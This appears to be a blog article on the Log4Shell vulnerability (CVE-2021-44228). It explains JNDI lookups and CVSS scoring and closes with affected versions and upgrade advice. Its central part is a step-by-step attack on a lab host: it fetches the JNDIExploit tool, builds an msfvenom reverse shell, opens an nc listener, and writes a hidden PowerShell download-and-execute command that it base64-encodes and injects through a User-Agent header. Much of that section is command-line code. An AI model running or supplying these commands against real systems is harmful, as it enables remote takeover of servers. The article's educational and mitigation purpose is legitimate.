
Log4Shell (CVE-2021-44228): Descrizione, Exploitation e Mitigazione
On December 9, 2021, the world became aware of a new security vulnerability concerning Log4J. The CVSSv3 (Common Vulnerability Scoring System) score of the vulnerability was assessed as 10, making it critical (https://nvd.nist.gov/vuln/detail/CVE-2021-44228).
Its CVSSv3 vector is as follows: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H.
Let's clarify the values so that the reason for the assessment can be fully understood:
Log4J is a Java library, now part of the Apache Software Foundation project, that allows you to monitor the state of an application.
It is the de facto standard for logging Java applications.
The vulnerability is based on JNDI (Java Naming and Directory Interface): a Java API that allows an application to interact with an external directory service (for example LDAP).
The interaction occurs through JNDI's lookup functionality, which, enabled in Log4J's default configuration, allows interaction with a remote server.
Some small clarifications useful for reading:
10.0.0.110.0.0.2x86 architecture80 and accessible at the URL http://hackme.com| ❗ WARNING ❗ |
|---|
| The attack technique described below should only be useful to understand the actual danger of the vulnerability in question. The author distances themselves from and condemns any improper use of the following article. |
The objective of the following attack is to exploit Log4Shell to download and execute a reverse shell on the vulnerable system, thus gaining full control of it.
wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 10.0.0.1 -p 2222
msfvenom so that we can receive remote access to the machine on port 8888msfvenom -p windows/shell/reverse_tcp LHOST=10.0.0.1 LPORT=8888 -f exe > payload.exe
nc, on port 8888 to receive the connection from the reverse shell uploaded to the vulnerable machinenc -lvnp 8888
python3 -m http.server 4444
C:\windows\temp directory, and execute itpowershell -ExecutionPolicy bypass -nop -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile("http://10.0.0.1:4444/payload.exe", "C:\Windows\temp\payload.exe");Start-Process("C:\Windows\temp\payload.exe")
base64 using the following commandecho 'powershell -ExecutionPolicy bypass -nop -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile("http://10.0.0.1:4444/payload.exe", "C:\Windows\temp\payload.exe");Start-Process("C:\Windows\temp\payload.exe")' | base64
The result of the previous command is as follows:
cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IGJ5cGFzcyAtbm9wIC13aW5kb3dzdHlsZSBoaWRkZW4gLWNvbW1hbmQgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzEwLjAuMC4xOjQ0NDQvcGF5bG9hZC5leGUiLCAiQzpcV2luZG93c1x0ZW1wXHBheWxvYWQuZXhlIik7U3RhcnQtUHJvY2VzcygiQzpcV2luZG93c1x0ZW1wXHBheWxvYWQuZXhlIik=
User-Agent of a visitor. The attacker sends a request similar to:GET / HTTP/1.1
Host: hackme.com
User-Agent: ${jdni:ldap://10.0.0.1:1389/Basic/Command/Base64/cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IGJ5cGFzcyAtbm9wIC13aW5kb3dzdHlsZSBoaWRkZW4gLWNvbW1hbmQgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzEwLjAuMC4xOjQ0NDQvcGF5bG9hZC5leGUiLCAiQzpcV2luZG93c1x0ZW1wXHBheWxvYWQuZXhlIik7U3RhcnQtUHJvY2VzcygiQzpcV2luZG93c1x0ZW1wXHBheWxvYWQuZXhlIik=}
${jdni:ldap://10.0.0.1:1389/Basic/Command/Base64/cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IGJ5cGFzcyAtbm9wIC13aW5kb3dzdHlsZSBoaWRkZW4gLWNvbW1hbmQgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzEwLjAuMC4xOjQ0NDQvcGF5bG9hZC5leGUiLCAiQzpcV2luZG93c1x0ZW1wXHBheWxvYWQuZXhlIik7U3RhcnQtUHJvY2VzcygiQzpcV2luZG93c1x0ZW1wXHBheWxvYWQuZXhlIik=}
is passed to Log4J, which interprets it and, via JNDI, makes the request to the attacker's LDAP server
ldap://10.0.0.1:1389/Basic/Command/Base64/cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IGJ5cGFzcyAtbm9wIC13aW5kb3dzdHlsZSBoaWRkZW4gLWNvbW1hbmQgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzEwLjAuMC4xOjQ0NDQvcGF5bG9hZC5leGUiLCAiQzpcV2luZG93c1x0ZW1wXHBheWxvYWQuZXhlIik7U3RhcnQtUHJvY2VzcygiQzpcV2luZG93c1x0ZW1wXHBheWxvYWQuZXhlIik=
The malware is downloaded and executed.
The attacker obtains a shell of the machine on port 8888.
First of all, it is important to remember that this vulnerability affects ONLY software that uses Java or some derivative (and obviously Log4J as a logging library).
2.0-beta9 - 2.14.1: The versions vulnerable to Log4Shell range from 2.0-beta9 to 2.14.1.2.15.0: Log4J version 2.15.0 was found vulnerable. CVE-2021-45046. Currently the vulnerability assessment is "9.0 Critical".2.16.0: Log4J version 2.16.0 was found vulnerable. CVE-2021-45105. Currently the vulnerability assessment is "7.5 High".Log4J version 1.x is not strictly vulnerable to the security flaw in question, but in addition to being deprecated in 2015, it is affected by the following vulnerability: CVE-2021-4104.
The best solution is to update Log4J to version 2.17.0.